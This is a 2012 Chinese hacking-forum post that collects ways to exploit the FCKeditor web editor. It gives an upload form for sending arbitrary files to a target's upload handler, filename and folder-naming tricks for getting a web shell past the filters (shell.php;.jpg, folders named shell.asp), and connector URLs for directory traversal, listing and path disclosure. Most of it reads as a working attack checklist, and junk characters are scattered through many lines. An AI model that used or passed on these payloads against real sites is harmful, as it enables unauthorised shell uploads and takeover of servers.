找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2997|回复: 1
打印 上一主题 下一主题

FCKeditor漏洞利用总结

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-5 20:23:31 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Fckeditor漏洞利用总结

查看编辑器版本
! t* ]8 d: K+ ?- F4 w/ ~FCKeditor/_whatsnew.html
  U# k, B/ ~' o) y3 R% K4 z2 d—————————————————————————————————————————————————————————————

2. Version 2.2 版本
% {8 o9 w( I  F+ A5 k' xApache+linux 环境下在上传文件后面加个.突破!测试通过。
. R# W  O  S* Z3 |% ^—————————————————————————————————————————————————————————————

3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。6 {3 T' R6 q. m3 _! E- o: \# E6 L
<form id="frmUpload" enctype="multipart/form-data"
* O3 g! N' E- F+ G6 J! @action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
; U9 L; L3 H% t& @) U! X<input type="file" name="NewFile" size="50"><br>
! E9 m1 `$ t! z: Q# `) f8 p& [<input id="btnUpload" type="submit" value="Upload">. j& v+ i6 A7 w+ J0 \" g
</form>; Y( V/ s* E% x
—————————————————————————————————————————————————————————————

4.FCKeditor 文件上传“.”变“_”下划线的绕过方法
  M8 _6 v* f" d$ U        很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。
4 r8 R& K! v& B+ e    4.1:提交shell.php+空格绕过: \+ C1 W" N! [8 n
不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。
( ~% n" Y8 c1 z    4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
( r2 e' P  ?' z9 ?1 e3 D2 n  w2 f0 _—————————————————————————————————————————————————————————————

5. 突破建立文件夹, ^5 m. ?6 G  z" z8 Y& {) K" k. ]
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=12447899756843 o, ~3 M" V+ {$ {1 L5 i
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
* S0 f- p- k! }# d8 h0 v—————————————————————————————————————————————————————————————

6. FCKeditor 中test 文件的上传地址
- W# q7 I2 `: f4 {FCKeditor/editor/filemanager/browser/default/connectors/test.html
/ d( `6 k2 Z- q/ xFCKeditor/editor/filemanager/upload/test.html: H# d; w( s, {. @" e" r
FCKeditor/editor/filemanager/connectors/test.html
- ?4 y- R. {. q0 uFCKeditor/editor/filemanager/connectors/uploadtest.html
8 B# z! g5 z! U- _5 t0 g7 D: U. M—————————————————————————————————————————————————————————————: G" O; x4 q* v+ G: L! P; x$ Z

7.常用上传地址4 v0 }4 ?; u* Q/ e* j1 S4 Z. a
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
/ k% }" P6 d7 ^7 Q/ w1 ~FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp& Z9 S$ q: l9 E7 y0 r" c. F
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)/ W, P" F; r3 U1 C: l
JSP 版:; i! t/ t3 h3 y" k2 j
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
, Y" R, c7 J/ X* m9 m$ z1 H注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文- b, A( V' `4 Q. d
件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址。
$ j& {( p" \! J' X4 P—————————————————————————————————————————————————————————————

8.其他上传地址
# h2 j: n7 t. G6 ]! T: x( g7 AFCKeditor/_samples/default.html$ Q! ]6 |3 q& _/ J* {/ A' w" R
FCKeditor/_samples/asp/sample01.asp
3 o* e) \- y7 @. m! ~FCKeditor/_samples/asp/sample02.asp9 m1 |% R4 o, ]" X9 P& ?: n1 u' m5 S
FCKeditor/_samples/asp/sample03.asp
7 y. |) V$ @2 m' _- iFCKeditor/_samples/asp/sample04.asp. y; n/ z7 D) t) T$ K
一般很多站点都已删除_samples 目录,可以试试。
0 o" u% G3 o  ]/ G# x9 o: B2 F' jFCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。
( j8 M4 z# r, M0 e8 B6 g$ ]3 M—————————————————————————————————————————————————————————————

9.列目录漏洞也可助找上传地址
, B: _; v2 y; @# \: g# _Version 2.4.1 测试通过
1 p. Z2 _9 Z$ X4 ~  K修改CurrentFolder 参数使用 ../../来进入不同的目录2 S- R) x+ T5 ~/ E/ J1 P
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp8 b3 V8 b+ `' E6 ~5 T7 k; ?+ r, y. x
根据返回的XML 信息可以查看网站所有的目录。
$ d! _& B  i1 aFCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F3 \( Y9 e9 I0 w& w; {+ e8 C
也可以直接浏览盘符:6 W$ `8 j+ i' o: {
JSP 版本:4 U7 S' t: P  K# B6 m
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F8 {8 c$ M4 |+ w  F' Z6 i/ j9 _" E: H# x
—————————————————————————————————————————————————————————————

10.爆路径漏洞/ ^1 s! l. C6 e5 H
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp
9 I) j& s3 p2 q0 k8 s$ o8 x—————————————————————————————————————————————————————————————

11. FCKeditor 被动限制策略所导致的过滤不严问题) [3 V7 j9 K) T! N% y  b% ~
        影响版本: FCKeditor x.x <= FCKeditor v2.4.3/ M/ z8 V3 t; u6 a& e0 P+ z/ O0 n4 I8 ^6 U
脆弱描述:
" u: x6 k$ O# ?2 [: |! yFCKeditor v2.4.3 中File 类别默认拒绝上传类型:7 M' G. Q: v+ {3 Q! W6 h2 Z& q: Y( r
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm, W' r- o8 s8 ~, F
Fckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!* V8 I2 Z5 A+ I. y: e$ D4 H; P
        而在apache 下,因为"Apache 文件名解析缺陷漏洞"也可以利用之,另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。
( Z/ f5 O3 i& f/ l, N        在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!

回复

使用道具 举报

沙发
发表于 2012-9-8 22:43:14 | 只看该作者

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表